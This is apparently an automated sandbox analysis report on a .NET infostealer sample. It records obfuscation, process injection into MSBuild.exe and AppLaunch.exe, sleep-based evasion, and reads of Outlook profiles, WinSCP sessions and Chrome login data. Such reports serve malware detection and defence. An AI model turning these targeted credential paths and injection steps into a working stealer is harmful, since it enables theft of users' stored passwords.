Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static file information: File size 2457088 > 1048576
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x247e00
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgp.cs .Net Code: jmv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, yX3qVQPc7HrPvyJ6nV/cZ6To4JeF1gFLqv7a4.cs .Net Code: TOsyUfqmE System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_05484A0F push 5D669499h; ret 0_2_05484A29
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06337E12 push es; retf 3382h 0_2_063388C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_06330540 pushad ; retf 0_2_06330541
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Code function: 0_2_063577AE push es; retf 0_2_063577BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_051322D4 push E9000001h; retn 0009h 16_2_051322E6
Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs High entropy of concatenated method names: '.cctor', 'R8V6PVGwssOvC', 'P2HJOU7G4', 'wcvPOg3MI', 'FGeQZ6To4', 'cF1ggFLqv', 'wa4rNX3qV', 'ec7CHrPvy', 'c6n3VdfEB', 'BOgbswNYn'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe TID: 2072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3508 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05135D66 sldt word ptr [eax] 16_2_05135D66
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Binary or memory string: lqEMUttqO=
Source: MSBuild.exe, 0000000E.00000003.421672820.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 16_2_05134520 LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher, 16_2_05134520
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46D000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BB2008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4D01008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR